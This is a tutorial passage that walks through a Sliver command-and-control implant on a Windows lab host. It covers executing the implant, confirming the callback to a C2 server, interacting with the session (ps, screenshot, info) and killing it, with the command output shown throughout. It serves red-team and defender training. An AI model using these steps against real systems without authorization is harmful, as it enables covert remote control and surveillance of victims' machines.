Skip to main content

Run a Windows Session

Deploy the Windows session implant to the target host, and run it:

PS C:\Users\steve\Downloads> .\winsession.exe

Once the implant has been executed, go back to the Sliver Client and run the sessions command to see if the implant has communicated back to the server:

sliver > sessions

 ID         Transport   Remote Address        Hostname    Username   Operating System   Health
========== =========== ===================== =========== ========== ================== =========
 a6402bf1   http(s)     192.168.0.117:53241   WinLaptop   steve      windows/amd64      [ALIVE]

We can now see that the implant was executed, communicated back to the Sliver Server, and it is "ALIVE". Next, run the use <ID> command to start interacting with the target host.

sliver > use a6402bf1

[*] Active session winsession (a6402bf1-7d62-43f0-9355-bca32edb3c9f)

sliver (winsession) >

(Note: if you hit the tab key following the UUID of the session, it will present the full string. This isn’t necessary, but there if you want it.)

Once you run the use command, you will notice that the Sliver command prompt will change with the name of the session included in it.

Running the ps command:

sliver (winsession) > ps

 Pid     Ppid    Owner             Arch     Executable                        Session
======= ======= ================= ======== ================================= =========
 0       0                                  [System Process]                  -1
 4       0                                  System                            -1
 108     4                                  Secure System                     -1
 144     4                                  Registry                          -1
 644     4                                  smss.exe                          -1

Through the implant, we can take a screenshot of the Windows target host. This screenshot will be on the client which executed the screenshot command.

sliver (winsession) > screenshot

[*] Screenshot written to /tmp/screenshot_WinLaptop_20241003140646_2578315628.png (148.6 KiB)

sliver (winsession) >

Additionally, you can get the information of the current implant by simply running the info command:

sliver (winsession) > info

        Session ID: a6402bf1-7d62-43f0-9355-bca32edb3c9f
              Name: winsession
          Hostname: WinLaptop
              UUID: 4c4c4544-004b-4310-805a-b2c04f4e5333
          Username: WinLaptop\steve
               UID: S-1-5-21-192289400-3165233833-1525390679-1001
               GID: S-1-5-21-192289400-3165233833-1525390679-513
               PID: 8836
                OS: windows
           Version: 10 build 22631 x86_64
            Locale: en-US
              Arch: amd64
         Active C2: https://192.168.0.120
    Remote Address: 192.168.0.117:53241
         Proxy URL:
Reconnect Interval: 1m0s
     First Contact: Thu Oct  3 14:00:25 EDT 2024 (13m50s ago)
      Last Checkin: Thu Oct  3 14:14:13 EDT 2024 (2s ago)

Once your use of the implant is finished, you can kill the process on the target host, or you can just kill the session in Sliver. Keep in mind that the executable will still be on the target host.

sliver (winsession) > sessions

 ID         Transport   Remote Address        Hostname    Username   Operating System   Health
========== =========== ===================== =========== ========== ================== =========
 a6402bf1   http(s)     192.168.0.117:53241   WinLaptop   steve      windows/amd64      [ALIVE]

sliver (winsession) > sessions -k a6402bf1

[!] Lost session a6402bf1 winsession - 192.168.0.117:53241 (WinLaptop) - windows/amd64 - Thu, 03 Oct 2024 14:20:02 EDT

sliver > sessions

[*] No sessions 🙁

sliver >